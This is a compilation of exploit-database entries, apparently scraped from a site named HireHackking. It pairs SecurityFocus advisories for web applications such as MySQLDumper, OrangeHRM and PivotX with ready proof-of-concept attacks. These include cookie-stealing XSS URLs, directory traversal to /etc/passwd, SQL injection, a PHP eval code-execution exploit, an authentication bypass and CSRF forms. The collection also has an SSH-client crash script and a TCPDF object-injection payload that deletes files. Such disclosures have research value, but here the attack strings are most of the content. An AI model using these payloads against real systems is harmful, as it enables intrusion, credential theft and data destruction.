HireHackking

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. <img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" /> <form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post"> <p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p> <input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit"> </form>

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/restore.php http://www.example.com/learn/cubemail/dump.php http://www.example.com/learn/cubemail/refresh_dblist.php

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00

# Exploit Title: WordPress Free Counter Plugin [Stored XSS] # Date: 2015/05/25 # Exploit Author: Panagiotis Vagenas # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://www.free-counter.org # Software Link: https://wordpress.org/plugins/free-counter/ # Version: 1.1 # Tested on: WordPress 4.2.2 # Category: webapps # CVE: CVE-2015-4084 1. Description Any authenticated or non-authenticated user can perform a stored XSS attack simply by exploiting wp_ajax_nopriv_check_stat action. Plugin uses a widget to display website's visits, so any page that contains this widget will also load the malicious JS code. 2. Proof of Concept * Send a post request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com` * As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'. * Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert(1)</script>` * Visit a page of the infected website that displays plugin's widget. Note that the plugin uses the update_option function to store the $_POST['value_'] contents to DB so any code inserted there will be escaped. Even though a malicious user can omit the quotes in the src attr of the script tag. Most modern browsers will treat the tag as they were there. 3. Solution No official solution yet exists.

source: https://www.securityfocus.com/bid/53306/info MySQLDumper is prone to multiple security vulnerabilities, including: 1. Multiple cross-site scripting vulnerabilities. 2. A local file-include vulnerability. 3. Multiple cross-site request-forgery vulnerabilities. 4. Multiple information-disclosure vulnerabilities. 5. A directory-traversal vulnerability. Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;

source: https://www.securityfocus.com/bid/53310/info MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process. MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. Vulnerable code section: /* //menu.php if (isset($_POST['selected_config'])||isset($_GET['config'])) { if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config']; // Configuration was switched in content frame? if (isset($_GET['config'])) $new_config=$_GET['config']; // restore the last active menuitem if (is_readable($config['paths']['config'].$new_config.'.php')) { clearstatcache(); unset($databases); $databases=array(); if (read_config($new_config)) { $config['config_file']=$new_config; $_SESSION['config_file']=$new_config; //$config['config_file']; $config_refresh=' <script language="JavaScript" type="text/javascript"> if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1) { var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value; } else selected_div=\'\'; parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>'; } if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern } } */ As you can see we can traverse it + if we will look to read_config() function //inc/functions_global.php function read_config($file=false) { global $config,$databases; $ret=false; if (!$file) $file=$config['config_file']; // protect from including external files $search=array(':', 'http', 'ftp', ' '); $replace=array('', '', '', ''); $file=str_replace($search,$replace,$file); if (is_readable($config['paths']['config'].$file.'.php')) { // to prevent modern server from caching the new configuration we need to evaluate it this way clearstatcache(); $f=implode('',file($config['paths']['config'].$file.'.php')); $f=str_replace('<?php','',$f); $f=str_replace('?>','',$f); eval($f); $config['config_file']=$file; $_SESSION['config_file']=$config['config_file']; $ret=true; } return $ret; } this means remote attacker can iterate his/her code as PHP.(Notice: eval($f)) Our exploit: http://www.example.com/learn/cubemail/menu.php?config=../../ss where ss = ss.php #cat ss.php # in eg attacker uploaded his/her own file: echo 'Our command executed ' . getcwd(); phpinfo();

source: https://www.securityfocus.com/bid/53398/info Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Trombinoscope 3.5 and prior versions are vulnerable. http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--

source: https://www.securityfocus.com/bid/53355/info iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp

source: https://www.securityfocus.com/bid/53411/info Ramui Forum Script is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22

source: https://www.securityfocus.com/bid/53409/info Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. The following products are affected: Schneider Electric Telecontrol Kerweb versions prior to 3.0.1 Schneider Electric Telecontrol Kerwin versions prior to 6.0.1 http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename=[XSS]

source: https://www.securityfocus.com/bid/53413/info JibberBook is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. Attackers can exploit this issue to bypass authentication to gain administrative privileges ; this may aid in launching further attacks. JibberBook 2.3 is vulnerable; other versions may also be affected. http://www.example.com/Admin/Login_form.php?loggedin=true

source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202

source: https://www.securityfocus.com/bid/53426/info PHP Enter is prone to a remote PHP code-injection vulnerability. An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. PHP Enter 4.1.2 is vulnerable; other versions may also be affected. <form method="post" action="http://www.example.com/admin/banners.php"> <center> <font color=#3A586A>Code</font><br /> <textarea name="code">&lt;/textarea&gt; <br /><br /> <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/> </form>

source: https://www.securityfocus.com/bid/53427/info The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability. Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1

source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E&empId=1

source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53448/info Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks. Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php

source: https://www.securityfocus.com/bid/53433/info OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. http://www.example.com/index.php?uri=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53434/info PivotX is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. PivotX 2.3.2 is vulnerable; other versions may also be affected. http://www.example.com/pivotx/ajaxhelper.php?function=view&file=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/53448/info Chevereto Image Upload Script is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. An attacker may leverage the information-disclosure issue to enumerate the existence of local files. Information obtained may aid in further attacks. Chevereto Image Upload Script 1.91 is vulnerable; other versions may also be affected. http://www.example.com/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>

''' # Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability # Date: 27-5-2015 # Vendor homepage: www.privateshell.com # Software Link: http://www.privateshell.com/files/pshell.exe # Version: 3.3 # Author: 3unnym00n # Details: # -------- # when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash # Tested On: win7 # operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@127.0.0.1 ''' import socket soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('127.0.0.1', 22)) soc.listen(1) client, addr = soc.accept() client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash

TCPDF library Universal POI Payload to Arbitrary File Deletion [+] Author: Filippo Roncari [+] Target: TCPDF library [+] Version: <= 5.9 and probably others [tested on v5.9] [+] Vendor: http://www.tcpdf.org [+] Accessibility: Remote [+] Severity: High [+] CVE: n/a [+] Advisory URL: n/a [+] Contacts: f.roncari@securenetwork.it / f@unsec.it [+] Summary TCPDF library is one of the world's most used open source PHP libraries, included in thousands of CMS and Web applications worldwide. More information at: http://en.wikipedia.org/wiki/TCPDF. A universal Object Injection payload for vulnerable PHP applications, which make use of TCPDF library, is here shared. [+] Exploit Details The identified payload allows to exploit any POI vulnerable web application that uses unserialize() on not sanitized user input in a point from which the Tcpdf class is loadable. The payload abuses the __destruct() magic method of the Tcpdf class defined in tcpdf.php and allows to arbitrary delete files on the filesystem. [+] Technical Details Tcpdf.php contains the Tcpdf class definition. The __destruct() method, at least up to version 5.9 (and possibly others), is implemented as follows. [!] Method __destruct() in tcpdf.php ------------------------- public function __destruct() { // restore internal encoding if (isset($this->internal_encoding) AND !empty($this->internal_encoding)) { mb_internal_encoding($this->internal_encoding); } // unset all class variables $this->_destroy(true); } ------------------------- As you can see, the main action performed by __destruct() is the invocation of the inner _destroy() method, which, along with other things, calls the unlink() function on the internal object buffer. [!] Method _destroy() in tcpdf.php ------------------------- public function _destroy($destroyall=false, $preserve_objcopy=false) { if ($destroyall AND isset($this->diskcache) AND $this->diskcache AND (!$preserve_objcopy) AND (!$this->empty_string($this->buffer))) { unlink($this->buffer); } [...] } ------------------------- For a better understanding of the payload, you should know that $buffer is defined as a protected property of the Tcpdf object, which means significant differences in serialization compared to normal properties. [!] $buffer in tcpdf.php ------------------------- /** * @var buffer holding in-memory PDF * @access protected */ protected $buffer; ------------------------- [+] Proof of Concept (PoC) In view of the above, the payload consists of a serialized Tcpdf object with two protected properties set: buffer and diskcache. The first will contain the path to the arbitrary file to delete, while diskcache is a boolean property set to true, necessary to enter the _destroy() inner if branch, in order to reach the unlink() call. A particular attention must be addressed to the null-bytes surrounding the asterisks before the property names. This is the way (crazy, I know) in which PHP serializes protected object properties. An incorrect conversion of the null-bytes during payload injection will result in the exploit failure. [!] Payload ------------------------- O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:[PATH_LENGTH]:"[FILE_PATH_TO_DELETE]";s:12:"%00*%00diskcache";b:1;} ------------------------- [!] Generic PoC Exploit ------------------------- http://vulnerablesite.com/vulnerable_page.php?vulnearble_par=O:5:"TCPDF":2:{s:9:"%00*%00buffer";s:26:"/var/www/arbitraryfile.ext";s:12:"%00*%00diskcache";b:1;} ------------------------- [+] Disclaimer Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.